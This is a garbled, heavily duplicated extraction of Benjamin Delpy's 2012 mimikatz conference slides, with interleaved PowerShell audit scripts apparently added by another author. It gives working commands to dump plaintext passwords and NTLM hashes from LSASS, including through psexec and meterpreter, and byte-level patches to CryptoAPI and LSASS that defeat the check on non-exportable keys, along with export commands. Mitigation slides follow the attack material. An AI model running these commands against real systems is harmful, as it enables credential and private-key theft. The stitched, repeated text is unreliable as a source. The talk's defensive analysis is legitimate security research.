07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz :: crypto :: memo
Some commands:
mimikatz crypto::patchcapi crypto::exportCertificates exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit
mimikatz "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop"
mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password – PFX files are protected by this password: mimikatz
Keys – When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it? • So yes, mimikatz can export it
mimikatz :: crypto :: what we can do?
Exactly the same as for sekurlsa: it will prevent access to accounts / computer – no admin, no admin, no admin…
Basics
– Use smartcards / tokens for users' certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth
– See what Microsoft can do with TPM from Windows 8 • Virtual SmartCard seems promising
– Verify vendors' implementation (Lenovo, Dell, …) of TPM CSP/KSP • Their biometrics stuff was a little buggy :)
mimikatz :: what else can it do?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilters actions
– List Notifications (process, thread, image, registry)
– List Objects hooks and procedures
– …
…
mimikatz :: that's all folks!
Thanks to / Merci à
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity • Partners and Sponsors for sure
– Microsoft for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges • nagual, newsoft, mubix, …
– You for your attention
Questions?
Don't be shy :)
…especially if you have written the corresponding slide number
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz :: sekurlsa :: memo
Some commands:
mimikatz privilege::debug "sekurlsa::logonPasswords full" exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit
meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

mimikatz 1.0 x64 (RC) /* Traitement du Kiwi (Aug 2 2012 01:32:28) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full

Authentification Id         : 0;234870
Package d'authentification  : NTLM
Utilisateur principal       : Gentil Kiwi
Domaine d'authentification  : vm-w8-rp-x
    msv1_0 :
     * Utilisateur  : Gentil Kiwi
     * Domaine      : vm-w8-rp-x
     * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
     * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
    kerberos :
     * Utilisateur  : Gentil Kiwi
     * Domaine      : vm-w8-rp-x
     * Mot de passe : waza1234
    wdigest :
     * Utilisateur  : Gentil Kiwi
     * Domaine      : vm-w8-rp-x
     * Mot de passe : waza1234
    tspkg :
     * Utilisateur  : Gentil Kiwi
     * Domaine      : vm-w8-rp-x
     * Mot de passe : waza1234
    livessp : n.t. (LUID KO)
mimikatz :: sekurlsa :: what we can do?
Basics
– No physical access to the computer (first step to pass the hash, then pass the pass)
– No admin rights, system rights, debug privileges (…)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless :))
– For privileged accounts, network logon instead of interactive (when possible)
– Audit: pass the hash keeps traces and can lock accounts
– No admin rights, system rights, debug privileges, even for VIPs
– Use a separated network (or forest) for privileged tasks
More in depth
– Force strong authentication (SmartCard & Token) $ €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– No exotic
• biometrics (it keeps the password somewhere and pushes it to Windows)
• single sign on
– Stop shared secrets for authentication, push Public/Private stuff (like keys ;))
– Leave opportunities to stop retro compatibility
– Disable faulty providers
• Is it supported by Microsoft?
• Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
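The "no debug privileges" item above is something an administrator can verify rather than assume. The following PowerShell is an added example, not code from the talk or from mimikatz: it exports the local user-rights policy with secedit and reports every account holding SeDebugPrivilege, the privilege that sekurlsa and crypto::patchcng need when not already running as SYSTEM. Get-DebugPrivilegeHolders is my own name; secedit.exe and its /export switches are the real Windows tool.

```powershell
# Added example (not from the talk): who holds SeDebugPrivilege on this host?
# Run in an elevated Windows PowerShell session; secedit needs admin to export the policy.
function Get-DebugPrivilegeHolders {
    $cfg = Join-Path $env:TEMP ("secpol-{0}.inf" -f [guid]::NewGuid())
    try {
        # secedit writes the local policy as an INI file; user rights live under [Privilege Rights]
        $null = secedit.exe /export /cfg $cfg /areas USER_RIGHTS
        if (-not (Test-Path -Path $cfg)) { throw 'secedit export failed (is the session elevated?)' }

        # Line looks like:  SeDebugPrivilege = *S-1-5-32-544,*S-1-5-21-...-1001
        $line = Get-Content -Path $cfg | Where-Object { $_ -match '^SeDebugPrivilege\s*=' }
        if (-not $line) { return @() }   # nobody holds it: the state the slide asks for

        ($line -split '=', 2)[1].Trim() -split ',' | ForEach-Object {
            $sid = $_.Trim().TrimStart('*')
            try {
                # Resolve the SID to DOMAIN\name; unresolvable SIDs (deleted or foreign accounts)
                # are reported as-is, they deserve a look too.
                $name = ([System.Security.Principal.SecurityIdentifier]$sid).Translate(
                            [System.Security.Principal.NTAccount]).Value
            } catch {
                $name = $sid
            }
            [pscustomobject]@{ Sid = $sid; Account = $name }
        }
    } finally {
        Remove-Item -Path $cfg -ErrorAction SilentlyContinue   # the export contains policy, not secrets, but keep TEMP clean
    }
}

# Usage: by default only BUILTIN\Administrators (S-1-5-32-544) should appear here.
Get-DebugPrivilegeHolders | Format-Table -AutoSize
```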
mimikatz :: crypto :: what is it?
A little module that I wrote to
– play with Windows Cryptographic API, CNG and RSA keys
– automate export of certificates/keys • Even those which are "not" exportable
What the crypto module can do
– List
• Providers
• Stores
• Certificates
• Keys
– Export
• Certificates
– public, in DER format
– with private keys, in PFX format
• Private keys in PVK format – it's cool, OpenSSL can deal with it too
– Patch
• CryptoAPI in mimikatz context
• CNG in LSASS context (again :))
mod_mimikatz_crypto
mimikatz :: crypto :: how it's protected?
Private keys are DPAPI protected – You cannot reuse private key files on another computer
• At least not without the master keys and/or passwords of users
Computer/User can load their own keys because they have enough secrets to do it (ex: session opened) – Yes, a computer/server opens a "session"
Export/Usage can be limited by
– Password
– Popup
– Export/Archive flag not present
[Figure annotations: "Constraint for most users"; "Unavailable for computer keys"]
certutil -importpfx mycert.p12 NoExport
certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto :: capi :: how it works?
"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware." – http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here…) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, … – cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API…
mimikatz :: crypto :: capi :: how it's exported? ( level)
[Diagram: Process – CryptoAPI and RSA CSP: Ask to export Key → Exportable? yes → Load Private Key → DPAPI Decode → Exported Key; no → NTE_BAD_KEY_STATE. Label: PLAYSKOOL]
mimikatz :: crypto :: patchcapi :: because I own my process
When we want to export a certificate with its private key (or only the key), it goes into rsaenh!CPExportKey
This function does all the work to prepare the export and checks if the key is exportable

mimikatz # crypto::exportCertificates
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
 - Benjamin Delpy
    Container Clé  : 470ADFBA-8718-4014-B05E-B30776B75A03
    Provider       : Microsoft Enhanced Cryptographic Provider v1.0
    Type           : AT_KEYEXCHANGE
    Exportabilité  : NON
    Taille clé     : 2048
    Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
    Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
[Figure annotation: Exportable]
mimikatz :: crypto :: patchcapi :: because I own my process
So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space
.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz continue_key_export_or_archive
.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp continue_key_export_or_archive
.text:0AC1F749 0F 85 B6 3B FF FF    jnz continue_key_export_or_archive_prepare
.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp continue_key_export_or_archive_prepare
mimikatz :: crypto :: patchcapi :: demo time
Import, export, import as not exportable… export!
mimikatz :: crypto :: patchcapi :: limitations
Because
– I'm lazy
– I've seen RSA keys in the majority of real-life cases • Elliptic Curve a little…
mimikatz crypto::patchcapi only deals with
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz :: crypto :: cng :: how it works?
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." – http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not made in the "user" process context
Processes use RPC to call "Key isolation service" (keyiso) functions
It seems more secure than CryptoAPI… – It is, but it's not perfect…
mimikatz :: crypto :: cng :: how it's exported? ( level)
[Diagram: Process – CNG: Ask to export Key → RPC → KeyIso Service (LSASS Process; NT6: System protected process, ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP): Exportable? yes → Load Private Key → DPAPI Decode → Exported Key; no → NTE_NOT_SUPPORTED. Label: PLAYSKOOL]
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass (keyiso) ncrypt!SPCryptExportKey
This function does all the work to prepare the export and checks if the key is exportable

mimikatz # crypto::exportKeys
[user]
Clés CNG :
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
    Exportabilité  : NON
    Taille clé     : 2048
    Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
    mod_cryptong::getPrivateKey / PrivateKeyBlobToPVK ; (0x80090029) L'opération demandée n'est pas prise en charge.
[Figure annotation: Exportable]
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS
This time, checks and keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…
.text:6C815210 75 1C    jnz short continue_key_export
.text:6C815210 EB 1C    jmp short continue_key_export
mimikatz :: crypto :: patchcng :: demo time
Import, export, import as not exportable… export again!
mimikatz :: crypto :: patchcng :: limitations
Patch operation needs some privileges
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (hu?) – certutil can…
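The two limitation slides together name exactly the software providers whose "exportable" check lives in patchable memory: the rsaenh.dll-based CSPs (checked in the calling process) and the Microsoft Software Key Storage Provider (checked inside LSASS by keyiso), which is why the "what we can do" slide pushes smartcards, HSMs and TPM-backed KSPs. The following PowerShell is an added example, not code from the talk or from mimikatz: it inventories every certificate with a private key in the user and machine stores and reports which API holds the key, its provider, whether it is flagged exportable, and whether it sits in one of those software providers. Get-SoftwareKeyExposure and $SoftwareProviders are my own names; the .NET members used are real.

```powershell
# Added example (not from the talk): which private keys rely only on a software CSP/KSP export flag?
# Assumes Windows PowerShell 5.1 (.NET Framework 4.6+) or PowerShell 7 on Windows.
using namespace System.Security.Cryptography
using namespace System.Security.Cryptography.X509Certificates

# Providers listed on the two limitations slides: five rsaenh.dll CSPs plus the Microsoft Software KSP.
$SoftwareProviders = @(
    'Microsoft Base Cryptographic Provider v1.0',
    'Microsoft Enhanced Cryptographic Provider v1.0',
    'Microsoft Enhanced RSA and AES Cryptographic Provider',
    'Microsoft RSA SChannel Cryptographic Provider',
    'Microsoft Strong Cryptographic Provider',
    'Microsoft Software Key Storage Provider'
)

function Get-SoftwareKeyExposure {
    [CmdletBinding()]
    param(
        [string[]]$StorePath = @('Cert:\CurrentUser\My', 'Cert:\LocalMachine\My')
    )
    foreach ($path in $StorePath) {
        foreach ($cert in (Get-ChildItem -Path $path -ErrorAction SilentlyContinue)) {
            if (-not $cert.HasPrivateKey) { continue }
            $row = [ordered]@{
                Store       = $path
                Subject     = $cert.Subject
                Thumbprint  = $cert.Thumbprint
                Api         = 'unknown'     # 'CryptoAPI' (CSP) or 'CNG' (KSP)
                Provider    = $null
                Exportable  = $null
                SoftwareKey = $false        # true when the provider is in $SoftwareProviders
            }
            $rsa = $null
            try {
                # .NET hands back RSACng for a KSP key and RSACryptoServiceProvider for a CSP key,
                # which is the CAPI-vs-CNG split the talk draws; non-RSA keys come back as $null.
                $rsa = [RSACertificateExtensions]::GetRSAPrivateKey($cert)
                if ($rsa -is [RSACng]) {
                    $row.Api      = 'CNG'
                    $row.Provider = $rsa.Key.Provider.Provider
                    # KSP-side export flags; this is the policy keyiso consults before exporting.
                    $allowed = [CngExportPolicies]::AllowExport -bor [CngExportPolicies]::AllowPlaintextExport
                    $row.Exportable = ([int]($rsa.Key.ExportPolicy -band $allowed)) -ne 0
                } elseif ($rsa -is [RSACryptoServiceProvider]) {
                    $row.Api        = 'CryptoAPI'
                    $row.Provider   = $rsa.CspKeyContainerInfo.ProviderName
                    # CSP-side flag; for rsaenh-based CSPs it is enforced inside the calling process.
                    $row.Exportable = $rsa.CspKeyContainerInfo.Exportable
                } elseif ($null -eq $rsa) {
                    $row.Provider = 'non-RSA key'
                }
            } catch {
                # Smart-card or HSM keys may prompt or fail without the token; record and move on.
                $row.Provider = "error: $($_.Exception.Message)"
            } finally {
                if ($rsa) { $rsa.Dispose() }
            }
            $row.SoftwareKey = $SoftwareProviders -contains $row.Provider
            [pscustomobject]$row
        }
    }
}

# Usage: the rows to act on are the software-held keys; hardware-backed providers never appear here.
Get-SoftwareKeyExposure |
    Where-Object SoftwareKey |
    Format-Table Store, Subject, Api, Provider, Exportable -AutoSize
```

A key reported with Exportable = False in a software provider is still only one in-process or in-LSASS check away from export, which is the talk's whole point; the fix is the provider, not the flag.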
mimikatz :: crypto :: patchcng :: bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for export can work too
– Yeah, like the good old certutil

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz - sekurlsa - what we can do
Basics
– No physical access to the computer (first step to pass-the-hash, then pass-the-pass)
– No admin rights, system rights, debug privileges (...)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless ;))
– For privileged accounts, network login instead of interactive (when possible)
– Audit: pass-the-hash keeps traces and can lock accounts
– No admin rights, system rights, debug privileges, even for VIPs
– Use a separated network (or forest) for privileged tasks
More in depth
– Force strong authentication (SmartCard & Token) $ €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– No exotic:
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign on
– Stop shared secrets for authentication, push public/private stuff (like keys ;))
– Take opportunities to stop retro-compatibility
– Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz - crypto - what is it?
A little module that I wrote to
– play with Windows Cryptographic API, CNG and RSA keys
– automate export of certificates/keys
  • Even those which are "not" exportable
What the crypto module can do
– List
  • Providers
  • Stores
  • Certificates
  • Keys
– Export
  • Certificates
    – public, in DER format
    – with private keys, in PFX format
  • Private keys in PVK format – it's cool, OpenSSL can deal with it too
– Patch
  • CryptoAPI in mimikatz context
  • CNG in LSASS context (again ;))
mod_mimikatz_crypto
mimikatz - crypto - how it's protected
Private keys are DPAPI protected
– You cannot reuse private key files on another computer
  • At least not without the master keys and/or passwords of users
Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
– Yes, a computer/server opens a "session"
Export/Usage can be limited by
– Password
– Popup
– Export/Archive flag not present
Constraint for most users / Unavailable for computer keys
certutil -importpfx mycert.p12 NoExport
certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz - crypto - capi - how it works
"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware." – http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, yourappshere...) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, ...
– cryptdll.dll, rsaenh.dll, ...
Processes deal with cryptographic keys through this API...
mimikatz - crypto - capi - how it's exported ( level)
[Diagram: Process → CryptoAPI and RSA CSP → Load Private Key → DPAPI Decode → Ask to export Key → Exportable? yes: Exported Key / no: NTE_BAD_KEY_STATE; label on the in-process key handling: PLAYSKOOL]
mimikatz - crypto - patchcapi - because I own my process
When we want to export a certificate with its private key (or only the key), it goes into rsaenh!CPExportKey
This function does all the work to prepare the export and checks if the key is exportable
mimikatz # crypto::exportCertificates
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
 - Benjamin Delpy
        Container Clé : 470ADFBA-8718-4014-B05E-B30776B75A03
        Provider      : Microsoft Enhanced Cryptographic Provider v1.0
        Type          : AT_KEYEXCHANGE
        Exportabilité : NON
        Taille clé    : 2048
        Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
        Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
[callout on the "Exportabilité : NON" line: Exportable]
mimikatz - crypto - patchcapi - because I own my process
So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space
.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz  continue_key_export_or_archive
.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp  continue_key_export_or_archive

.text:0AC1F749 0F 85 B6 3B FF FF    jnz  continue_key_export_or_archive_prepare
.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp  continue_key_export_or_archive_prepare
mimikatz - crypto - patchcapi - demo time
Import, export, import as not exportable... export
mimikatz - crypto - patchcapi - limitations
Because
– I'm lazy
– I've seen, in the majority of cases, RSA keys for real life use
  • Elliptic Curve, a little...
mimikatz crypto::patchcapi only deals with
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
